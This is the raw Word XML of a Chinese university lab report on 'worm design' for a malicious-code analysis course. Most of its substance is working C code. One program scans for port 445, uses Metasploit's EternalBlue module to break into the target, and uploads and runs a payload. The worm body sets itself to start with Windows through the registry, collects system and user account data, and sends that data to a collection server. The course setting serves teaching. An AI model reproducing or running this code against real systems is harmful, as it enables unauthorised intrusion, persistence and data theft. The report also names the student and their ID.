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宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>福建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">理工大学 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>计算机科学与数学学院</w:t>
      </w:r>
    </w:p>
    <w:p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《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恶意代码分析与处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/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ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3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ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–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202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4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学年第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>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b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szCs w:val="21"/>
        </w:rPr>
        <w:t>学期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539"/>
        <w:gridCol w:w="963"/>
        <w:gridCol w:w="1647"/>
        <w:gridCol w:w="473"/>
        <w:gridCol w:w="1326"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="9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1539" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines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恶意代码分析与处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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647" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>网安2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473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1326" w:type="dxa"/>
            <w:vAlign w:val="center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3220812128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567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901" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines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章百琪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06" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines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实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines/>
              <w:jc w:val="left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实验4：蠕虫设计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1647" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines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267" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p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2024-05-28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实验目的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>及要求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目的：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1.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要求：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1.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实验环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>及工具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8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr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Kali、win7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实验原理及技术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auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32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（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>实验涉及原理及技术介绍</w:t>
            </w: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）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋" w:cs="仿宋"/>
                <w:color w:val="auto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32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用msf渗透工具攻击靶机，实现蠕虫上传并散播。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实验过程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>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF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32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>（实验步骤、现象、截图）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实现蠕虫的上传模块，先利用namp扫描某个网段下的主机是否开启445端口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且是否存在漏洞。如果存在漏洞就启动msf去攻击靶机，并将蠕虫本体上传过去，并启动。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代码实现：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>#include &lt;stdlib.h&gt;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>#include &lt;stdio.h&gt;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>#include &lt;string.h&gt;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>#include &lt;glob.h&gt;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>#define MAX_LINE_LENGTH 1024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>int main(int argc, char *argv[]) {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if (argc != 2) {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printf("用法: %s &lt;目标IP&gt;\n", argv[0]);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return 1;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FILE *file;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char line[MAX_LINE_LENGTH];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char *target_ip = argv[1];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char nmap_command[MAX_LINE_LENGTH];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snprintf(nmap_command, sizeof(nmap_command), "nmap -p 445 --open -oG result.txt %s", target_ip);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int ret = system(nmap_command);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if (ret == -1) {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perror("执行nmap命令时出错");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return 1;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file = fopen("result.txt", "r");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if (file == NULL) {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perror("打开result.txt时出错");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return 1;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while (fgets(line, sizeof(line), file) != NULL) {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if (strstr(line, "445/open/tcp//microsoft-ds///") != NULL) {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FILE *msfconsole = popen("msfconsole", "w");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if (msfconsole == NULL) {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perror("打开msfconsole时出错");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fclose(file);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return 1;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}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fprintf(msfconsole, "use exploit/windows/smb/ms17_010_eternalblue\n");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fprintf(msfconsole, "set RHOSTS %s\n", target_ip);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fprintf(msfconsole, "run\n");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fprintf(msfconsole, "upload /root/桌面/test.exe C:/Users/22737/Desktop/\n");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fprintf(msfconsole, "shell\n");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fprintf(msfconsole, "cd C:/Users/22737/Desktop/\n");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fprintf(msfconsole, "test.exe\n");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fprintf(msfconsole, "exit\n");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fprintf(msfconsole, "exit\n");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if (pclose(msfconsole) == -1) {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perror("关闭msfconsole时出错");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fclose(file);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return 1;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}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fclose(file);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// 使用glob找到所有匹配的文件并转换编码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glob_t glob_result;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memset(&amp;glob_result, 0, sizeof(glob_result));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// 查找所有匹配received_file_*.txt的文件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int glob_ret = glob("/root/received_file_*.txt", GLOB_TILDE, NULL, &amp;glob_result);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if (glob_ret != 0) {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perror("使用glob函数时出错");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globfree(&amp;glob_result);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return 1;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}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for (size_t i = 0; i &lt; glob_result.gl_pathc; ++i) {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char iconv_command[MAX_LINE_LENGTH];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 char mv_command[MAX_LINE_LENGTH];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snprintf(iconv_command, sizeof(iconv_command), "iconv -f GB2312 -t UTF-8 %s -o %s", glob_result.gl_pathv[i], glob_result.gl_pathv[i]);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snprintf(mv_command, sizeof(mv_command), "mv %s /root/桌面/", glob_result.gl_pathv[i]);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// 打印调试信息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printf("执行: %s\n", iconv_command);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ret = system(iconv_command);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if (ret == -1) {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    perror("执行iconv命令时出错");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    globfree(&amp;glob_result);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    return 1;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}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}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globfree(&amp;glob_result);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printf("文件转码成功\n");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    return 0;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    }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printf("未找到漏洞服务。\n");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fclose(file);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 xml:space="preserve">    return 0;</w:t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  <w:t>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执行效果：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr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5262880" cy="2626995"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="190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62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2880" cy="2626995"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="190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62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262880" cy="2626995"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="190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262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靶机实现了上传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086350" cy="3810000"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0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实现蠕虫本体，包括信息收集模块，自启模块，传播模块。自启可以通过修改注册表添加自启项实现，信息收集可以通过启用命令行执行名命令实现，传播模块可以检查主机是否存在远程连接，通过远程连接将自身传播出去并设置计划任务。获取信息后，通过http传输给主机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代码实现：#include &lt;stdio.h&gt;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#include &lt;stdlib.h&gt;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#include &lt;string.h&gt;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#include &lt;winsock2.h&gt;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#include &lt;windows.h&gt;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#pragma comment(lib, "ws2_32.lib")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long get_file_size(const char* file_path)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FILE* file = fopen(file_path, "rb");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(!file)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exit(1);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fseek(file, 0, SEEK_END);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long size = ftell(file);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fclose(file);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return size;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void run_command(const char* command, const char* filename)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FILE* fp = fopen(filename, "a");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(fp == NULL)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return;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fprintf(fp, "---------- %s ----------\n", command); // 写入命令名称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// 使用 _popen() 函数捕获命令输出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FILE* pipe = _popen(command, "r");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(pipe == NULL)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fclose(fp);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return;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char buffer[1024];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while (fgets(buffer, sizeof(buffer), pipe) != NULL) { // 逐行读取命令输出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fprintf(fp, "%s", buffer); // 将命令输出写入文件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_pclose(pipe); // 关闭管道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fclose(fp); // 关闭文件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void collect_system_info()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const char* filename = "info.txt";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FILE* fp = fopen(filename, "w");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(fp == NULL)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return;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fclose(fp);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// 执行命令并将信息写入文件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run_command("ipconfig", filename); // 执行 ipconfig 命令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run_command("systeminfo", filename); // 执行 systeminfo 命令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run_command("netstat -ano", filename); // 执行 netstat -ano 命令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run_command("tasklist /svc", filename); // 执行 tasklist /svc 命令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run_command("net user", filename); // 执行 net user 命令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run_command("net localgroup", filename); // 执行 net localgroup 命令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run_command("net share", filename); // 执行 net share 命令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void send_file(const char* server, int port, const char* path, const char* local_file)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WSADATA wsaData;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SOCKET sock;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struct sockaddr_in serverAddr;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char buffer[1024];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FILE* fp;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int bytes_sent, bytes_read;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long file_size = get_file_size(local_file);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const char* boundary = "AaB03x";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char header[1024];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char footer[1024];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snprintf(header, sizeof(header), "--%s\r\nContent-Disposition: form-data; name=\"file\"; filename=\"%s\"\r\nContent-Type: application/octet-stream\r\n\r\n", boundary, local_file);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snprintf(footer, sizeof(footer), "\r\n--%s--\r\n", boundary);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long content_length = strlen(header) + file_size + strlen(footer);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(WSAStartup(MAKEWORD(2, 2), &amp;wsaData) != 0)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exit(1);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((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)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WSACleanup();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exit(1);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serverAddr.sin_family = AF_INET;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serverAddr.sin_port = htons(port);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serverAddr.sin_addr.s_addr = inet_addr(server);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memset(serverAddr.sin_zero, '\0', sizeof(serverAddr.sin_zero));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(connect(sock, (struct sockaddr*)&amp;serverAddr, sizeof(serverAddr)) &lt; 0)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closesocket(sock);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WSACleanup();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exit(1);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snprintf(buffer, sizeof(buffer), "POST %s HTTP/1.1\r\n"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    "Host: %s:%d\r\n"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    "Content-Type: multipart/form-data; boundary=%s\r\n"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        "Content-Length: %ld\r\n\r\n",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path, server, port, boundary, content_length);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bytes_sent = send(sock, buffer, strlen(buffer), 0);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(bytes_sent != strlen(buffer))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closesocket(sock);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WSACleanup();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exit(1);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bytes_sent = send(sock, header, strlen(header), 0);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(bytes_sent != strlen(header))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closesocket(sock);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WSACleanup();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exit(1);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fp = fopen(local_file, "rb");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(!fp)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closesocket(sock);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WSACleanup();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exit(1);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while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) &gt; 0)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bytes_sent = send(sock, buffer, bytes_read, 0);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if (bytes_sent != bytes_read)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fclose(fp);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closesocket(sock);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WSACleanup();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exit(1);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fclose(fp);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bytes_sent = send(sock, footer, strlen(footer), 0);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(bytes_sent != strlen(footer))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closesocket(sock);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WSACleanup();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exit(1);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return ; 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closesocket(sock);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WSACleanup();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exit(0);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int AddToAutoStart(const char* szPath, const char* szName)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HKEY hKey;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wchar_t wPath[MAX_PATH];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wchar_t wName[MAX_PATH];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MultiByteToWideChar(CP_ACP, 0, szPath, -1, wPath, MAX_PATH);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MultiByteToWideChar(CP_ACP, 0, szName, -1, wName, MAX_PATH);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(RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &amp;hKey) == ERROR_SUCCESS)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if (RegSetValueExW(hKey, wName, 0, REG_SZ, (BYTE*)wPath, (wcslen(wPath) + 1) * sizeof(wchar_t)) == ERROR_SUCCESS)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RegCloseKey(hKey);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return 1;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else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RegCloseKey(hKey);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    return -1;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else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return -1;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void run_net_use()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char filename[] = "net_use_output.txt";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FILE* file = fopen(filename, "w");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(file == NULL)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return;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STARTUPINFO si;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PROCESS_INFORMATION pi;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memset(&amp;si, 0, sizeof(si));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si.cb = sizeof(si);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si.dwFlags = STARTF_USESTDHANDLES;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si.hStdOutput = si.hStdError = file;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char command[] = "net use";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CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &amp;si, &amp;pi);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fclose(file);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int main(int argc, char* argv[])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char selfPath[MAX_PATH];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GetModuleFileName(NULL, selfPath, MAX_PATH);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AddToAutoStart(selfPath, "YourProgramName");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ab/>
            </w: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run_net_use();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collect_system_info(); // 收集系统信息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char exePath[MAX_PATH];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GetModuleFileName(NULL, exePath, MAX_PATH);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char* lastSlash = strrchr(exePath, '\\');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if (lastSlash != NULL) {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    *lastSlash = '\0'; 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strcat(exePath,"\\info.txt");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send_file("192.168.159.143", 8000, "/root ", exePath); // 发送文件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 xml:space="preserve">    return 0;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}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执行效果：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drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5086350" cy="3810000"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="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成功添加注册表</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5086350" cy="3810000"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="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信息文件成功回传</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5273675" cy="1443355"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="4445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2405" cy="2423160"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="254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42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实验结论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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32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（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>实验结果描述</w:t>
            </w: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）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成功将蠕虫上传，并成功运行。</w:t>
            </w:r>
          </w:p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shd w:val="clear" w:color="auto" w:fill="FDEADA" w:themeFill="accent6" w:themeFillTint="32"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepLines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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pP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（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>心得体会，存在问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/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通过本次实验，我了解了蠕虫的工作机制。并成功实现了一个蠕虫设计。实验通过msf对445端口存在漏洞的目标机器进行了攻击，成功实现了蠕虫的上传与传播。首先，使用nmap扫描目标网段内的主机，确认445端口开放并存在漏洞后，利用msf的ms17_010_eternalblu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e模块进行攻击，成功获取目标主机控制权并上传蠕虫文件。随后，蠕虫自启动模块通过修改注册表实现自启动，信息收集模块执行系统命令并将结果传回控制服务器。实验展示了漏洞利用的危害和攻击流程的复杂性，强调了及时修补系统漏洞和提升系统防护的重要性</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:keepLines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8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</w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:keepLines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6B1307"/>
    <w:rsid w:val="00005BAC"/>
    <w:rsid w:val="00013A2B"/>
    <w:rsid w:val="00060F34"/>
    <w:rsid w:val="00063F51"/>
    <w:rsid w:val="000709B5"/>
    <w:rsid w:val="00075937"/>
    <w:rsid w:val="0009571E"/>
    <w:rsid w:val="000A3E08"/>
    <w:rsid w:val="000A43AD"/>
    <w:rsid w:val="000A53BA"/>
    <w:rsid w:val="000A5732"/>
    <w:rsid w:val="000B78CF"/>
    <w:rsid w:val="000C3B8E"/>
    <w:rsid w:val="000F4DDC"/>
    <w:rsid w:val="00112450"/>
    <w:rsid w:val="00134AC8"/>
    <w:rsid w:val="00154E4C"/>
    <w:rsid w:val="001621F2"/>
    <w:rsid w:val="001A0F1B"/>
    <w:rsid w:val="001C67F6"/>
    <w:rsid w:val="001F3990"/>
    <w:rsid w:val="0021149B"/>
    <w:rsid w:val="00220939"/>
    <w:rsid w:val="00250150"/>
    <w:rsid w:val="002572E6"/>
    <w:rsid w:val="00267780"/>
    <w:rsid w:val="00315E92"/>
    <w:rsid w:val="00315FAB"/>
    <w:rsid w:val="003324AF"/>
    <w:rsid w:val="00337B96"/>
    <w:rsid w:val="00343C18"/>
    <w:rsid w:val="00353F42"/>
    <w:rsid w:val="00384A66"/>
    <w:rsid w:val="00421D79"/>
    <w:rsid w:val="0043314B"/>
    <w:rsid w:val="0045241A"/>
    <w:rsid w:val="00454A15"/>
    <w:rsid w:val="00473B2E"/>
    <w:rsid w:val="00487AB8"/>
    <w:rsid w:val="004C553A"/>
    <w:rsid w:val="004E38F8"/>
    <w:rsid w:val="005972D6"/>
    <w:rsid w:val="005A2155"/>
    <w:rsid w:val="005E6D0D"/>
    <w:rsid w:val="005F6D02"/>
    <w:rsid w:val="00613211"/>
    <w:rsid w:val="0061684E"/>
    <w:rsid w:val="0063520D"/>
    <w:rsid w:val="00654B96"/>
    <w:rsid w:val="006667DC"/>
    <w:rsid w:val="006923A8"/>
    <w:rsid w:val="006B1307"/>
    <w:rsid w:val="006B211D"/>
    <w:rsid w:val="006C4544"/>
    <w:rsid w:val="006D0376"/>
    <w:rsid w:val="00746E3F"/>
    <w:rsid w:val="00755ED5"/>
    <w:rsid w:val="00770911"/>
    <w:rsid w:val="00786E25"/>
    <w:rsid w:val="00795767"/>
    <w:rsid w:val="007D5A3C"/>
    <w:rsid w:val="008036DC"/>
    <w:rsid w:val="00842982"/>
    <w:rsid w:val="00851476"/>
    <w:rsid w:val="00896D2A"/>
    <w:rsid w:val="008D52E0"/>
    <w:rsid w:val="008D5A8A"/>
    <w:rsid w:val="008E60CD"/>
    <w:rsid w:val="008E62F7"/>
    <w:rsid w:val="008F4B53"/>
    <w:rsid w:val="009A13A1"/>
    <w:rsid w:val="009A36E5"/>
    <w:rsid w:val="009B4A3E"/>
    <w:rsid w:val="009D7928"/>
    <w:rsid w:val="00A56A17"/>
    <w:rsid w:val="00A65FD2"/>
    <w:rsid w:val="00A83899"/>
    <w:rsid w:val="00A95D40"/>
    <w:rsid w:val="00AA3B86"/>
    <w:rsid w:val="00AF363F"/>
    <w:rsid w:val="00B0162C"/>
    <w:rsid w:val="00B1017C"/>
    <w:rsid w:val="00BC0393"/>
    <w:rsid w:val="00BE4B16"/>
    <w:rsid w:val="00C12131"/>
    <w:rsid w:val="00C14ACC"/>
    <w:rsid w:val="00C74821"/>
    <w:rsid w:val="00C8400E"/>
    <w:rsid w:val="00D53FAC"/>
    <w:rsid w:val="00D60BBD"/>
    <w:rsid w:val="00D742DC"/>
    <w:rsid w:val="00D82A0C"/>
    <w:rsid w:val="00D917BB"/>
    <w:rsid w:val="00DE274D"/>
    <w:rsid w:val="00DE6FEE"/>
    <w:rsid w:val="00DF54B6"/>
    <w:rsid w:val="00E76716"/>
    <w:rsid w:val="00EA2E68"/>
    <w:rsid w:val="00EB4B7E"/>
    <w:rsid w:val="00EC058D"/>
    <w:rsid w:val="00F01C21"/>
    <w:rsid w:val="00F553D0"/>
    <w:rsid w:val="00F677AC"/>
    <w:rsid w:val="028A4D16"/>
    <w:rsid w:val="079A50EF"/>
    <w:rsid w:val="159018F8"/>
    <w:rsid w:val="192D0976"/>
    <w:rsid w:val="1B8F5B60"/>
    <w:rsid w:val="1EFA01E5"/>
    <w:rsid w:val="268D41B9"/>
    <w:rsid w:val="2D800A7D"/>
    <w:rsid w:val="322438DF"/>
    <w:rsid w:val="33A36274"/>
    <w:rsid w:val="342F59EC"/>
    <w:rsid w:val="34C15FC4"/>
    <w:rsid w:val="375F39C6"/>
    <w:rsid w:val="44775031"/>
    <w:rsid w:val="5A870729"/>
    <w:rsid w:val="5D527DE9"/>
    <w:rsid w:val="647B1880"/>
    <w:rsid w:val="649C6849"/>
    <w:rsid w:val="65071F0A"/>
    <w:rsid w:val="69572AAD"/>
    <w:rsid w:val="6AFE43AE"/>
    <w:rsid w:val="6CF36A4E"/>
    <w:rsid w:val="7B5543F3"/>
    <w:rsid w:val="7DCC35B5"/>
    <w:rsid w:val="7F2A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qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="20"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="1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annotation subject"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="2"/>
    <w:link w:val="19"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="9">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="8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Table Simple 3"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine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2">
    <w:name w:val="page number"/>
    <w:basedOn w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="Hyperlink"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF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character" w:styleId="15">
    <w:name w:val="annotation reference"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="页眉 字符"/>
    <w:link w:val="5"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="页脚 字符"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="批注文字 字符"/>
    <w:link w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="批注主题 字符"/>
    <w:link w:val="7"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="批注框文本 字符"/>
    <w:link w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="屏幕2"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="260" w:lineRule="atLeast"/>
      <w:ind w:left="851"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:kern w:val="0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</Words>
  <Characters>186</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>154</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>217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2020-04-22T12:11:00Z</dcterms:created>
  <dc:creator>SDWM</dc:creator>
  <cp:lastModifiedBy>`</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-30T13:18:49Z</dcterms:modified>
  <dc:title>福建工程学院信息科学与工程学院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27A02B8F41B24A578F4DF617254346E8_13</vt:lpwstr>
  </property>
</Properties>
</file>